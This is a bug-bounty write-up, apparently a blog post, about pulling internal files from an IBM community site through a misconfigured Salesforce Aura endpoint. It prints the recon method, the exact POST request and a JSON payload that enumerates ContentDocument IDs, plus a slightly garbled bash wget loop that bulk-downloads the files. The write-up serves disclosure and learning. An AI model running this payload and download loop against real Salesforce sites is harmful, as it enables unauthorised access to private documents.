BOOK THIS SPACE FOR AD
ARTICLE ADHi, today I will share how I was able to access internal data of https://weathercommunity.ibm.com using salesforce misconfiguration.
This write-up will depends on this great blog: Salesforce
so please read it first then read this write-up.
After I read this blog, I wanted to exploit it in the wild so I now I wanted to see the subdomains which point to on of the following CNAMEs:
*.force.com
*.secure.force.com
*live.siteforce.com
I used this great tool https://github.com/yghonem14/cngo to get CNMAEs of all the websites that have program on hackerone through https://chaos.projectdiscovery.io/
I found this subdomain weathercommunity.ibm.com which pointing out to: thercommunity.ibm.com.00de0000000avgcma2.live.siteforce.com
I found an endpoint like:
POST /s/sfsites/aura?r=2&applauncher.CommunityLogo.getCommunityName=1&applauncher.CommunityLogo.getLogoURL=1&applauncher.EmployeeLoginLink.getEmployeeLoginUrl=1&applauncher.EmployeeLoginLink.getIsAllowInternalUserLoginEnabled=1&applauncher.SocialLogin.getAuthProviders=1&applauncher.SocialLogin.getSamlProviders=1&applauncher.SocialLogin.handleIdp=1&other.LightningLoginForm.getForgotPasswordUrl=1&other.LightningLoginForm.getIsSelfRegistrationEnabled=1&other.LightningLoginForm.getIsUsernamePasswordEnabled=1&other.LightningLoginForm.getSelfRegistrationUrl=1&ui-communities-components-aura-components-forceCommunity-richText.RichText.getParsedRichTextValue=2&ui-communities-components-aura-components-forceCommunity-seoAssistant.SeoAssistant.getSeoLanguageData=1 HTTP/1.1then I sent this POST request to the Repeater and changed the Message parameter value to:
{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"MARKER","layoutType":"FULL","pageSize":100,"currentPage":0,"useTimeout":false,"getCount":false,"enableRowActions":false}}]}Replacing the MARKER string with: ContentDocument
See that there are more than 900 ID. I extracted the ID value which started with 069 and made a simple bash script to download them one by one through this endpoint /sfc/servlet.shepherd/document/download/$ID
https://weathercommunity.ibm.com/sfc/servlet.shepherd/document/download/ID
Example:
https://weathercommunity.ibm.com/sfc/servlet.shepherd/document/download/0690h0000060wuHAAQ
while read ido wget --no-check-certificate "https://weathercommunity.ibm.com/sfc/servlet.shepherd/document/download/$i"
done < $1
Sample of the internal images:
Reporting:
Twitter:
twitter.com/mohamed12742780